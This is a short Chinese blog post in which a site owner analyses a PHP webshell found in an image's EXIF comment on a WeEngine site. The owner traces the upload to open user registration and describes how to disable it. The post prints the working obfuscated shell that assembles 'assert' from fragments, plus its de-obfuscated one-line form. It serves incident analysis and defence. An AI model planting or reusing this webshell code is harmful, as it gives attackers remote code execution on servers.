版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/lengyue1084/article/details/86590284
阿里云提示:
然后 找到目录文件瞅一眼是个啥,打开还真是个图片。
既然提示是木马,总的分析一下看看,exif_read_data函数读取 EXIF 头信息
看下图片注释头信息:
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
木马原形:
<?php assert($_POST[-7])?> 使用原理不做介绍了。
简单说下使用微擎的过程中存在的问题,因为这个马是微擎站挂上的。
我检查了微擎站点的,这个应该是我使用过程中粗心导致的,排查过程发现系统多了几个test111这类用户。而图片木马就是通过其中一个账户上传的,主要原因应该是开启了用户注册,然后注册用户设置为不需要审核,然后流氓通过注册用户来登陆后台,上传自己的图片木马。
用户可以通过 xxxx.com/web/index.php?c=user&a=registerset& 检查站点是否开启了用户注册。关掉用户注册功能即可
如果不放心可以xxxx.com/web/index.php?c=user&a=register检测是否开启了该功能。
提醒一下演示站最好做好权限管理。